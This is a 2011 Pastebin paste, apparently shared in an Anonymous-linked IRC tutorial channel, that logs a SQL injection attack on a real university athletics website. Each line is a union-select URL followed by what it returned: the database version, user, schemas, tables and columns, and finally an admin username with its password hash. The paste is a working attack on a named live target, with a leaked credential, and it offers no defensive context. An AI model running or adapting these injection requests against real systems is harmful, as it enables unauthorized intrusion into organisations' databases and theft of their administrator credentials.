Advertisement
sql

Sql Injection - Haskell Indian Nations University

sql
Jun 29th, 2011
1,524
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.36 KB | None | 0 0
  1. irc.anonops.li - #tutorials - #bhlynx - sql
  2.  
  3. http://www.haskell.edu/athletics/index.php?cid=101-1+union+select+0,1,@@version,4,5--
  4. 5.1.56-community-log
  5.  
  6. http://www.haskell.edu/athletics/index.php?cid=101-1+union+select+0,1,user%28%29,4,5--
  7. haskelle_haskell@localhost
  8.  
  9. http://www.haskell.edu/athletics/index.php?cid=101-1+union+select+0,1,group_concat%28schema_name%29,4,5%20from+information_schema.schemata--
  10. information_schema,haskelle_haskellathletics,haskelle_zencart
  11.  
  12. http://www.haskell.edu/athletics/index.php?cid=101-1+union+select+0,1,database(),4,5--
  13. haskelle_haskellathletics
  14.  
  15. http://www.haskell.edu/athletics/index.php?cid=101-1+union+select+0,1,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--
  16. admin_users,categories,news,rosters
  17.  
  18. http://www.haskell.edu/athletics/index.php?cid=101-1+union+select+0,1,group_concat(column_name),4,5 from information_schema.columns where table_schema=database()--
  19.  
  20. admin_user_id,admin_username,admin_password,category_id,category_name,news_id,category_id,news_headline,news_content,date_posted,roster_id,category_id,first_name,last_name,number,position,height,weight,class,hometown,tribe
  21.  
  22. http://www.haskell.edu/athletics/index.php?cid=101-1+union+select+0,1,group_concat%28admin_username,0x3a,admin_password,0x3a%29,4,5%20from%20admin_users--
  23. admin:618337e3c6860fbf46b1dbaa8463cd1f
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement